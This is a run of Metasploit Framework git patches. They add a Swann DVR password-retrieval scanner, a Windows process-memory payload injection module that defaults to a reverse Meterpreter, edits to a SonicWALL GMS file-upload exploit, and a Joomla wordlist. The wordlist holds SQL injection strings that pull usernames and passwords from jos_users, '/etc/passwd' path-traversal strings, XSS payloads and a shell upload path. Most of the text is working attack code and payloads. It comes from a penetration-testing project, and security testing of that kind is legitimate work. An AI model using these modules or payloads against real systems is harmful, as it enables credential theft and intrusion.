Subject: [PATCH 131/421] Adds a password grabber module for Swann DVRs --- .../scanner/misc/swann_dvr_passwords.rb | 112 ++++++++++++++++++ 1 file changed, 112 insertions(+) create mode 100644 modules/auxiliary/scanner/misc/swann_dvr_passwords.rb diff --git a/modules/auxiliary/scanner/misc/swann_dvr_passwords.rb b/modules/auxiliary/scanner/misc/swann_dvr_passwords.rb new file mode 100644 index 000000000000..45f4eab6604a --- /dev/null +++ b/modules/auxiliary/scanner/misc/swann_dvr_passwords.rb @@ -0,0 +1,112 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'Swann DVR Password Retriever', + 'Description' => %q{ + This module takes advantage of a protocol design issue with the + Swann DVR systems. It is possible to retrieve the username and + password through the TCP service running on port 9000. Other + brand DVRs with the same issue may include Lorex, Night Owl, Zmodo + URMET, nad KGuard Security. + }, + 'Author' => + [ + 'someluser', # Python script + 'hdm', # Metasploit module + ], + 'References' => + [ + [ 'URL', 'http://console-cowboys.blogspot.com/2013/01/swann-song-dvr-insecurity.html' ] + ], + 'License' => MSF_LICENSE + ) + + register_options( [ Opt::RPORT(9000) ], self.class) + end + + def run_host(ip) + req = + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0E\x0F" + + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00" + + ( "\x00" * 475 ) + + connect + sock.put(req) + + buf = "" + begin + # Pull data until the socket closes or we time out + Timeout.timeout(15) do + loop do + res = sock.get_once(-1, 1) + buf << res if res + end + end + rescue ::Timeout::Error + rescue ::EOFError + end + + disconnect + + info = "" + mac = nil + ver = nil + + creds = {} + + buf.scan(/[\x00\xff]([\x20-\x7f]{1,32})\x00+([\x20-\x7f]{1,32})\x00\x00([\x20-\x7f]{1,32})\x00/m).each do |cred| + # Make sure the two passwords match + next unless cred[1] == cred[2] + creds[cred[0]] = cred[1] + end + + if creds.keys.length > 0 + creds.keys.sort.each do |user| + pass = creds[user] + report_auth_info({ + :host => rhost, + :port => rport, + :sname => 'dvr', + :duplicate_ok => false, + :user => user, + :pass => pass + }) + info << "(user='#{user}' pass='#{pass}') " + end + end + + # Look for MAC address + if buf =~ /([0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2})/mi + mac = $1 + end + + # Look for version + if buf =~ /(V[0-9]+\.[0-9][^\x00]+)/m + ver = $1 + end + + info << "mac=#{mac} " if mac + info << "version=#{ver} " if ver + + return unless (creds.keys.length > 0 or mac or ver) + + report_service(:host => rhost, :port => rport, :sname => 'dvr', :info => info) + print_good("#{rhost}:#{rport} #{info}") + end + +end From 477ab65d55be2985cf2a0b0ed347a54ca7c5ac02 Mon Sep 17 00:00:00 2001 From: Tasos Laskos <Tasos_Laskos@rapid7.com> Date: Wed, 23 Jan 2013 23:05:22 +0200 Subject: [PATCH 132/421] Exploit::Remote::Web: added #tries method #tries method indicates how many times we should run a module until we establish a session. --- lib/msf/core/exploit/web.rb | 16 +++++++++++----- 1 file changed, 11 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/exploit/web.rb b/lib/msf/core/exploit/web.rb index bd86a410cbb8..df77fa4c366d 100644 --- a/lib/msf/core/exploit/web.rb +++ b/lib/msf/core/exploit/web.rb @@ -28,7 +28,7 @@ def initialize( info = {} ) super register_options([ - OptString.new( 'PATH', [ true, 'The path to the vulnerable script.', '/' ] ), + OptString.new( 'PATH', [ true, 'The path to the vulnerable script.', '/' ] ), OptString.new( 'GET', [ false, "GET parameters. ('foo=bar&vuln=#{WEB_PAYLOAD_STUB}', #{WEB_PAYLOAD_STUB} will be substituted with the payload.)", "" ] ), OptString.new( 'POST', [ false, "POST parameters. ('foo=bar&vuln=#{WEB_PAYLOAD_STUB}', #{WEB_PAYLOAD_STUB} will be substituted with the payload.)", "" ] ), OptString.new( 'COOKIES', [ false, "Cookies to be sent with the request. ('foo=bar;vuln=#{WEB_PAYLOAD_STUB}', #{WEB_PAYLOAD_STUB} will be substituted with the payload.)", "" ] ), @@ -76,13 +76,19 @@ def check def exploit print_status "Sending HTTP request for #{path}" if res = perform_request - print_status "The server responded with HTTP status code #{res.code}." - else - print_status 'The server did not respond to our request.' - end + print_status "The server responded with HTTP status code #{res.code}." + else + print_status 'The server did not respond to our request.' + end handler + end + + def tries + 1 end + private + def perform_request send_request_cgi({ 'global' => true, From 22f76198927508e26fc5652e5bff490caa4431c1 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 23 Jan 2013 16:15:14 -0600 Subject: [PATCH 133/421] Improve Carlos' payload injection module - See #1201 Lots of changes, mainly: * Description update * Avoid accessing protected methods * More careful exception & return value handling --- .../exploits/windows/local/payload_inject.rb | 115 +++++++++++------- 1 file changed, 70 insertions(+), 45 deletions(-) diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb index 73bb94aa4520..268b13a02bfe 100644 --- a/modules/exploits/windows/local/payload_inject.rb +++ b/modules/exploits/windows/local/payload_inject.rb @@ -16,9 +16,9 @@ def initialize(info={}) super( update_info( info, 'Name' => 'Windows Manage Memory Payload Injection Module', 'Description' => %q{ - This module will inject into the memory of a process a specified windows payload. - If a payload or process is not provided one will be created by default - using a reverse x86 TCP Meterpreter Payload. + This module will inject a payload into memory of a process. If a payload + isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID + datastore option isn't specified, then it'll inject into notepad.exe instead. }, 'License' => MSF_LICENSE, 'Author' => @@ -34,31 +34,45 @@ def initialize(info={}) register_options( [ - OptInt.new('PID', - [false, 'Process Identifier to inject of process to inject payload.']) + OptInt.new('PID', [false, 'Process Identifier to inject of process to inject payload.']), + OptBool.new('NEWPROCESS', [false, 'New notepad.exe to inject to', false]) ], self.class) end # Run Method for when run command is issued def exploit + @payload_name = datastore['PAYLOAD'] + @payload_arch = framework.payloads.create(@payload_name).arch + # syinfo is only on meterpreter sessions print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? - pid = datastore['PID'] - - if pid == 0 - pid = create_temp_proc() + pid = get_pid + if not pid + print_error("Unable to get a proper PID") + return end - if payload.send(:pinst).arch.first =~ /64/ and client.platform =~ /x86/ + if @payload_arch.first =~ /64/ and client.platform =~ /x86/ print_error("You are trying to inject to a x64 process from a x86 version of Meterpreter.") print_error("Migrate to an x64 process and try again.") return false else - inject_into_pid(pid,datastore['NEWPROCESS']) + inject_into_pid(pid) end end + # Figures out which PID to inject to + def get_pid + pid = datastore['PID'] + if pid == 0 or datastore['NEWPROCESS'] + print_status("Launching notepad.exe...") + pid = create_temp_proc + end + + return pid + end + # Checks the Architeture of a Payload and PID are compatible # Returns true if they are false if they are not def arch_check(pid) @@ -66,12 +80,12 @@ def arch_check(pid) client.sys.process.processes.each do |p| # Check Payload Arch if pid == p["pid"] - print_status("Process found checking Architecture") - if payload.send(:pinst).arch.first == p['arch'] - print_good("Process is the same architecture as the payload") + vprint_status("Process found checking Architecture") + if @payload_arch.first == p['arch'] + vprint_good("Process is the same architecture as the payload") return true else - print_error("The PID #{ p['arch']} and Payload #{payload.send(:pinst).arch.first} architectures are different.") + print_error("The PID #{ p['arch']} and Payload #{@payload_arch.first} architectures are different.") return false end end @@ -83,45 +97,56 @@ def arch_check(pid) def create_temp_proc() windir = client.fs.file.expand_path("%windir%") # Select path of executable to run depending the architecture - if payload.send(:pinst).arch.first== "x86" and client.platform =~ /x86/ + if @payload_arch.first== "x86" and client.platform =~ /x86/ cmd = "#{windir}\\System32\\notepad.exe" - elsif payload.send(:pinst).arch.first == "x86_64" and client.platform =~ /x64/ + elsif @payload_arch.first == "x86_64" and client.platform =~ /x64/ cmd = "#{windir}\\System32\\notepad.exe" - elsif payload.send(:pinst).arch.first == "x86_64" and client.platform =~ /x86/ + elsif @payload_arch.first == "x86_64" and client.platform =~ /x86/ cmd = "#{windir}\\Sysnative\\notepad.exe" - elsif payload.send(:pinst).arch.first == "x86" and client.platform =~ /x64/ + elsif @payload_arch.first == "x86" and client.platform =~ /x64/ cmd = "#{windir}\\SysWOW64\\notepad.exe" end - # run hidden - proc = client.sys.process.execute(cmd, nil, {'Hidden' => true }) + + begin + proc = client.sys.process.execute(cmd, nil, {'Hidden' => true }) + rescue Rex::Post::Meterpreter::RequestError + return nil + end + return proc.pid end - def inject_into_pid(pid,newproc) - print_status("Performing Architecture Check") - # If architecture check fails and a new process is wished to inject to one with the proper arch - # will be created - if arch_check(pid) - pid = create_temp_proc() if newproc - print_status("Injecting #{payload.send(:pinst).name} into process ID #{pid}") - begin - print_status("Opening process #{pid}") - host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) - print_status("Generating payload") - raw = payload.generate - print_status("Allocating memory in procees #{pid}") - mem = host_process.memory.allocate(raw.length + (raw.length % 1024)) - # Ensure memory is set for execution - host_process.memory.protect(mem) - print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager") - print_status("Writing the stager into memory...") - host_process.memory.write(mem, raw) - host_process.thread.create(mem, 0) - print_good("Successfully injected payload in to process: #{pid}") - rescue ::Exception => e - print_error("Failed to Inject Payload to #{pid}!") - print_error(e.to_s) + def inject_into_pid(pid) + vprint_status("Performing Architecture Check") + return if not arch_check(pid) + + begin + print_status("Preparing '#{@payload_name}' for PID #{pid}") + raw = payload.generate + + print_status("Opening process #{pid.to_s}") + host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) + if not host_process + print_error("Unable to open #{pid.to_s}") + return end + + print_status("Allocating memory in procees #{pid}") + mem = host_process.memory.allocate(raw.length + (raw.length % 1024)) + + # Ensure memory is set for execution + host_process.memory.protect(mem) + + print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager") + print_status("Writing the stager into memory...") + host_process.memory.write(mem, raw) + host_process.thread.create(mem, 0) + print_good("Successfully injected payload in to process: #{pid}") + + rescue Rex::Post::Meterpreter::RequestError => e + print_error("Unable to inject payload:") + print_line(e.to_s) end end + end \ No newline at end of file From ad108900d5e3263a19ab6dad36d11b845ca76c5c Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 23 Jan 2013 16:23:41 -0600 Subject: [PATCH 134/421] Why yes I know it's a module --- modules/exploits/windows/local/payload_inject.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb index 268b13a02bfe..cc4efe818254 100644 --- a/modules/exploits/windows/local/payload_inject.rb +++ b/modules/exploits/windows/local/payload_inject.rb @@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Local def initialize(info={}) super( update_info( info, - 'Name' => 'Windows Manage Memory Payload Injection Module', + 'Name' => 'Windows Manage Memory Payload Injection', 'Description' => %q{ This module will inject a payload into memory of a process. If a payload isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID From 3418457b9aca9f7d3885d18cb1f52e6c0d992c5f Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 23 Jan 2013 16:29:25 -0600 Subject: [PATCH 135/421] Small changes (extra comma + typo) --- modules/auxiliary/scanner/misc/swann_dvr_passwords.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/misc/swann_dvr_passwords.rb b/modules/auxiliary/scanner/misc/swann_dvr_passwords.rb index 45f4eab6604a..559e439b6a4f 100644 --- a/modules/auxiliary/scanner/misc/swann_dvr_passwords.rb +++ b/modules/auxiliary/scanner/misc/swann_dvr_passwords.rb @@ -22,12 +22,12 @@ def initialize Swann DVR systems. It is possible to retrieve the username and password through the TCP service running on port 9000. Other brand DVRs with the same issue may include Lorex, Night Owl, Zmodo - URMET, nad KGuard Security. + URMET, and KGuard Security. }, 'Author' => [ 'someluser', # Python script - 'hdm', # Metasploit module + 'hdm' # Metasploit module ], 'References' => [ From 53599e4c4509c47794056cfa0ca681a1c22518af Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 23 Jan 2013 16:32:57 -0600 Subject: [PATCH 136/421] It's better to have a version # in the title, easier to find --- modules/exploits/multi/http/sonicwall_gms_upload.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index f786338546cf..9dace48321cc 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'SonicWALL GMS Arbitrary File Upload', + 'Name' => 'SonicWALL GMS 6 Arbitrary File Upload', 'Description' => %q{ This module exploits a code execution flaw in SonicWALL GMS. It exploits two vulnerabilities in order to get its objective. An authentication bypass in the From 9c3e9f798f13d809ce1e3749a4e3a3db2e29eb60 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 23 Jan 2013 16:39:24 -0600 Subject: [PATCH 137/421] Lower the ranking, because it cannot auto-target. When it's excellent, Pro will fire this first, and that will only generate more traffic than actually popping a shell. --- modules/exploits/multi/http/sonicwall_gms_upload.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index 9dace48321cc..d0b10798ce84 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GoodRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } From 75f3a62ac46eb2f94640c52b97fe70d94f254341 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 23 Jan 2013 16:43:36 -0600 Subject: [PATCH 138/421] Explain why we need this empty on_new_session --- modules/exploits/multi/http/sonicwall_gms_upload.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index d0b10798ce84..4abf1ce64523 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -71,7 +71,7 @@ def initialize(info = {}) def on_new_session - + # on_new_session will force stdapi to load (for Linux meterpreter) end From 6e94c04a52bc2f90557bffe332abaeb7030051f2 Mon Sep 17 00:00:00 2001 From: f8lerror <f8lerror+git@gmail.com> Date: Wed, 23 Jan 2013 20:26:23 -0500 Subject: [PATCH 139/421] Code Corrections and Enhancements --- data/wordlists/joomla.txt | 627 ++++++++++++++++++ .../auxiliary/scanner/http/joomla_vulnscan.rb | 160 +++-- 2 files changed, 719 insertions(+), 68 deletions(-) create mode 100755 data/wordlists/joomla.txt diff --git a/data/wordlists/joomla.txt b/data/wordlists/joomla.txt new file mode 100755 index 000000000000..b1e651d504bf --- /dev/null +++ b/data/wordlists/joomla.txt @@ -0,0 +1,627 @@ +&controller=../../../../../../../../../../../../[LFI]%00 +?1.5.10-x +?1.5.11-x-http_ref +?1.5.11-x-php-s3lf +?1.5.3-path-disclose +?1.5.3-spam +?1.5.8-x +?1.5.9-x +?j1012-fixate-session +?option=com_mysms&Itemid=0&task=phonebook +Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png +admin/ +administrator/ +administrator/components/ +administrator/components/com_a6mambocredits/ +administrator/components/com_a6mambohelpdesk/ +administrator/components/com_admin/admin.admin.html.php +administrator/components/com_astatspro/refer.php +administrator/components/com_bayesiannaivefilter/ +administrator/components/com_chronocontact/excelwriter/PPS/File.php +administrator/components/com_colophon/ +administrator/components/com_colorlab/ +administrator/components/com_comprofiler/ +administrator/components/com_comprofiler/plugin.class.php +administrator/components/com_cropimage/admin.cropcanvas.php +administrator/components/com_extplorer/ +administrator/components/com_feederator/includes/tmsp/add_tmsp.php +administrator/components/com_googlebase/ +administrator/components/com_installer +administrator/components/com_jcs/ +administrator/components/com_jim/ +administrator/components/com_jjgallery/ +administrator/components/com_joom12pic/ +administrator/components/com_joomla-visites/ +administrator/components/com_joomla_flash_uploader/ +administrator/components/com_joomlaflashfun/ +administrator/components/com_joomlaradiov5/ +administrator/components/com_jpack/ +administrator/components/com_jreactions/ +administrator/components/com_juser/ +administrator/components/com_admin/ +administrator/components/com_kochsuite / +administrator/components/com_linkdirectory/ +administrator/components/com_livechat/getSavedChatRooms.php +administrator/components/com_livechat/xmlhttp.php +administrator/components/com_lurm_constructor/admin.lurm_constructor.php +administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php"); +administrator/components/com_mambelfish/ +administrator/components/com_mgm/ +administrator/components/com_mmp/help.mmp.php +administrator/components/com_mosmedia/ +administrator/components/com_multibanners/extadminmenus.class.php +administrator/components/com_panoramic/ +administrator/components/com_peoplebook/param.peoplebook.php +administrator/components/com_phpshop/toolbar.phpshop.html.php +administrator/components/com_remository/admin.remository.php +administrator/components/com_serverstat/install.serverstat.php +administrator/components/com_simpleswfupload/uploadhandler.php"); +administrator/components/com_swmenupro/ +administrator/components/com_treeg/ +administrator/components/com_uhp/ +administrator/components/com_uhp2/ +administrator/components/com_webring/ +administrator/components/com_wmtgallery/ +administrator/components/com_wmtportfolio/ +administrator/components/com_x-shop/ +administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+ +administrator/index.php?option=com_searchlog&act=log +ajaxim/ +akocomments.php +cart?Itemid=[SQLi] +component/com__brightweblinks/ +component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0 +component/osproperty/?task=agent_register +component/quran/index.php?option=com_quran&action=viewayat&surano= +components/com_ clickheat/ +components/com_5starhotels/ +components/com_Jambook/jambook.php +components/com_a6mambocredits/ +components/com_a6mambohelpdesk/ +components/com_ab_gallery/ +components/com_acajoom/ +components/com_acctexp/ +components/com_aclassf/ +components/com_activities/ +components/com_actualite/ +components/com_admin/admin.admin.html.php +components/com_advancedpoll/ +components/com_agora/ +components/com_agoragroup/ +components/com_ajaxchat/ +components/com_akobook/ +components/com_akocomment/ +components/com_akogallery +components/com_alberghi/ +components/com_allhotels/ +components/com_alphacontent/ +components/com_altas/ +components/com_amocourse/ +components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php +components/com_articles/ +components/com_artist/ +components/com_artlinks/ +components/com_asortyment/ +components/com_astatspro/ +components/com_awesom/ +components/com_babackup/ +components/com_banners/ +components/com_bayesiannaivefilter/ +components/com_be_it_easypartner/ +components/com_beamospetition/ +components/com_biblestudy/ +components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +components/com_blog/ +components/com_bookflip/ +components/com_bookjoomlas/ +components/com_booklibrary/ +components/com_books/ +components/com_bsadv/ +components/com_bsq_sitestats/ +components/com_bsq_sitestats/external/rssfeed.php +components/com_bsqsitestats/ +components/com_calendar/ +components/com_camelcitydb2/ +components/com_candle/ +components/com_casino_blackjack/ +components/com_casino_videopoker/ +components/com_casinobase/ +components/com_catalogproduction/ +components/com_catalogshop/ +components/com_category/ +components/com_cgtestimonial/video.php?url="><script>alert('xss');</script> +components/com_chronocontact/excelwriter/PPS/File.php +components/com_cinema/ +components/com_clasifier/ +components/com_classifieds/ +components/com_clickheat/ +components/com_cloner/ +components/com_cmimarketplace/ +components/com_cms/ +components/com_colophon/ +components/com_colorlab/ +components/com_competitions/ +components/com_comprofiler/ +components/com_comprofiler/plugin.class.php +components/com_contactinfo/ +components/com_content/ +components/com_cpg/cpg.php +components/com_cropimage/admin.cropcanvas.php +components/com_custompages/ +components/com_cx/ +components/com_d3000/ +components/com_dadamail/ +components/com_dailymessage/ +components/com_datsogallery/ +components/com_dbquery/ +components/com_detail/ +components/com_digistore/ +components/com_directory/ +components/com_djiceshoutbox/ +components/com_doc/ +components/com_downloads/ +components/com_ds-syndicate/ +components/com_dtregister/ +components/com_dv/externals/phpupload/upload.php"); +components/com_easybook/ +components/com_emcomposer/ +components/com_equotes/ +components/com_estateagent/ +components/com_eventing/ +components/com_eventlist/ +components/com_events/ +components/com_ewriting/ +components/com_expose/uploadimg.php +components/com_expshop/ +components/com_extcalendar/ +components/com_extcalendar/cal_popup.php?extmode=view&extid= +components/com_extcalendar/extcalendar.php +components/com_extended_registration/registration_detailed.inc.php +components/com_extplorer/ +components/com_ezine/ +components/com_ezstore/ +components/com_facileforms/ +components/com_fantasytournament/ +components/com_faq/ +components/com_feederator/includes/tmsp/add_tmsp.php +components/com_filebase/ +components/com_filiale/ +components/com_flashfun/ +components/com_flashmagazinedeluxe/ +components/com_flippingbook/ +components/com_flyspray/startdown.php +components/com_fm/fm.install.php +components/com_foevpartners/ +components/com_football/ +components/com_formtool/ +components/com_forum/ +components/com_fq/ +components/com_fundraiser/ +components/com_galeria/ +components/com_galleria/galleria.html.php +components/com_gallery/ +components/com_game/ +components/com_gameq/ +components/com_garyscookbook/ +components/com_genealogy/ +components/com_geoboerse/ +components/com_gigcal/ +components/com_gmaps/ +components/com_googlebase/ +components/com_gsticketsystem/ +components/com_guide/ +components/com_hashcash/server.php +components/com_hbssearch/ +components/com_hello_world/ +components/com_hotproperties/ +components/com_hotproperty/ +components/com_hotspots/ +components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php +components/com_hwdvideoshare/ +components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1"); +components/com_ice/ +components/com_idoblog/ +components/com_idvnews/ +components/com_ignitegallery/ +components/com_ijoomla_archive/ +components/com_ijoomla_rss/ +components/com_inter/ +components/com_ionfiles/ +components/com_is/ +components/com_ixxocart/ +components/com_jabode/ +components/com_jashowcase/ +components/com_jb2/ +components/com_jce/ +components/com_jcs/ +components/com_jd-wiki/ +components/com_jd-wp/ +components/com_jim/ +components/com_jjgallery/ +components/com_jmovies/ +components/com_jobline/ +components/com_jombib/ +components/com_joobb/ +components/com_jooget/ +components/com_joom12pic/ +components/com_joomla-visites/ +components/com_joomla_flash_uploader/ +components/com_joomlaboard/ +components/com_joomladate/ +components/com_joomlaflashfun/ +components/com_joomlalib/ +components/com_joomlaradiov5/ +components/com_joomlavvz/ +components/com_joomlaxplorer/ +components/com_joomloads/ +components/com_joomradio/ +components/com_joomtracker/ +components/com_joovideo/ +components/com_jotloader/ +components/com_journal/ +components/com_jpack/ +components/com_jpad/ +components/com_jreactions/ +components/com_jreviews/scripts/xajax.inc.php +components/com_jumi/ +components/com_juser/ +components/com_jvideo/ +components/com_k2/ +components/com_kbase/ +components/com_knowledgebase/fckeditor/fckeditor.js +components/com_kochsuite / +components/com_kunena/ +components/com_letterman/ +components/com_lexikon/ +components/com_linkdirectory/ +components/com_listoffreeads/ +components/com_livechat/getSavedChatRooms.php +components/com_livechat/xmlhttp.php +components/com_liveticker/ +components/com_lm/ +components/com_lmo/ +components/com_loudmounth/includes/abbc/abbc.class.php +components/com_loudmouth/ +components/com_lowcosthotels/ +components/com_lurm_constructor/admin.lurm_constructor.php +components/com_mad4joomla/ +components/com_madeira/img.php +components/com_maianmusic/ +components/com_mailarchive/ +components/com_mailto/ +components/com_mambatstaff/mambatstaff.php +components/com_mambelfish/ +components/com_mambospgm/ +components/com_mambowiki/MamboLogin.php +components/com_marketplace/ +components/com_mcquiz/ +components/com_mdigg/ +components/com_media_library/ +components/com_mediaslide/ +components/com_mezun/ +components/com_mgm/ +components/com_minibb/ +components/com_misterestate/ +components/com_mmp/help.mmp.php +components/com_model/ +components/com_moodle/moodle.php +components/com_moofaq/ +components/com_mosmedia/ +components/com_mospray/scripts/admin.php +components/com_mosres/ +components/com_most/ +components/com_mp3_allopass/ +components/com_mtree/ +components/com_mtree/img/listings/o/{id}.php +components/com_multibanners/extadminmenus.class.php +components/com_myalbum/ +components/com_mycontent/ +components/com_mydyngallery/ +components/com_mygallery/ +components/com_n-forms/ +components/com_na_content/ +components/com_na_mydocs/ +components/com_na_newsdescription/ +components/com_na_qforms/ +components/com_neogallery/ +components/com_neorecruit/ +components/com_neoreferences/ +components/com_netinvoice/ +components/com_news/ +components/com_news_portal/ +components/com_newsflash/ +components/com_nfn_addressbook/ +components/com_nicetalk/ +components/com_noticias/ +components/com_omnirealestate/ +components/com_omphotogallery/ +components/com_ongumatimesheet20/ +components/com_onlineflashquiz/ +components/com_ownbiblio/ +components/com_panoramic/ +components/com_paxgallery/ +components/com_paxxgallery/ +components/com_pcchess/ +components/com_pcchess/include.pcchess.php +components/com_pccookbook/ +components/com_pccookbook/pccookbook.php +components/com_peoplebook/param.peoplebook.php +components/com_performs/ +components/com_philaform/ +components/com_phocadocumentation/ +components/com_php/ +components/com_phpshop/toolbar.phpshop.html.php +components/com_pinboard/ +components/com_pms/ +components/com_poll/ +components/com_pollxt/ +components/com_ponygallery/ +components/com_portafolio/ +components/com_portfol/ +components/com_prayercenter/ +components/com_pro_desk/ +components/com_prod/ +components/com_productshowcase/ +components/com_profiler/ +components/com_projectfork/ +components/com_propertylab/ +components/com_puarcade/ +components/com_publication/ +components/com_quiz/ +components/com_rapidrecipe/ +components/com_rdautos/ +components/com_realestatemanager/ +components/com_recly/ +components/com_referenzen/ +components/com_rekry/ +components/com_remository/admin.remository.php +components/com_remository_files/file_image_14/1276100016shell.php +components/com_reporter/processor/reporter.sql.php +components/com_resman/ +components/com_restaurante/ +components/com_ricette/ +components/com_rsfiles/ +components/com_rsgallery/ +components/com_rsgallery2/ +components/com_rss/ +components/com_rssreader/ +components/com_rssxt/ +components/com_rwcards/ +components/com_school/ +components/com_search/ +components/com_sebercart/getPic.php?p=[LFD]%00 +components/com_securityimages/ +components/com_sef/ +components/com_seminar/ +components/com_serverstat/install.serverstat.php +components/com_sg/ +components/com_simple_review/ +components/com_simpleboard/ +components/com_simplefaq/ +components/com_simpleshop/ +components/com_sitemap/sitemap.xml.php +components/com_slideshow/ +components/com_smf/ +components/com_smf/smf.php +components/com_swmenupro/ +components/com_team/ +components/com_tech_article/ +components/com_thopper/ +components/com_thyme/ +components/com_tickets/ +components/com_tophotelmodule/ +components/com_tour_toto/ +components/com_trade/ +components/com_uhp/ +components/com_uhp2/ +components/com_user/controller.php +components/com_users/ +components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php +components/com_vehiclemanager/ +components/com_versioning / +components/com_videodb/core/videodb.class.xml.php +components/com_virtuemart/ +components/com_volunteer/ +components/com_vr/ +components/com_waticketsystem/ +components/com_webhosting/ +components/com_weblinks/ +components/com_webring/ +components/com_wmtgallery/ +components/com_wmtportfolio/ +components/com_x-shop/ +components/com_xevidmegahd/ +components/com_xewebtv/ +components/com_xfaq/ +components/com_xgallery/helpers/img.php?file= +components/com_xsstream-dm/ +components/com_ynews/ +components/com_yvcomment/ +components/com_zoom/classes/ +components/mod_letterman/ +components/remository/ +eXtplorer/ +easyblog/entry/uncategorized +extplorer/ +components/com_mtree/img/listings/o/{id}.php where {id} +includes/joomla.php +index.php/404' +index.php/?option=com_question&catID=21' and+1=0 union all +index.php/image-gallery/"><script>alert('xss')</script>/25-koala +index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 +index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view +index.php?option=com_aardvertiser&cat_name=conf&task=<= +index.php?option=com_aardvertiser&task= +index.php?option=com_abc&view=abc&letter=AS§ionid=' +index.php?option=com_advert&id=36' +index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users-- +index.php?option=com_alfurqan15x&action=viewayat&surano= +index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version +index.php?option=com_annonces&view=edit&Itemid=1 +index.php?option=com_articleman&task=new +index.php?option=com_bbs&bid=-1 +index.php?option=com_beamospetition&startpage=3&pet=- +index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users- +index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27 +index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1 +index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users-- +index.php?option=com_chronoconnectivity&itemid=1 +index.php?option=com_chronocontact&itemid=1 +index.php?option=com_cinema&Itemid=S@BUN&func=detail&id= +index.php?option=com_clantools&squad=1+ +index.php?option=com_clantools&task=clanwar&showgame=1+ 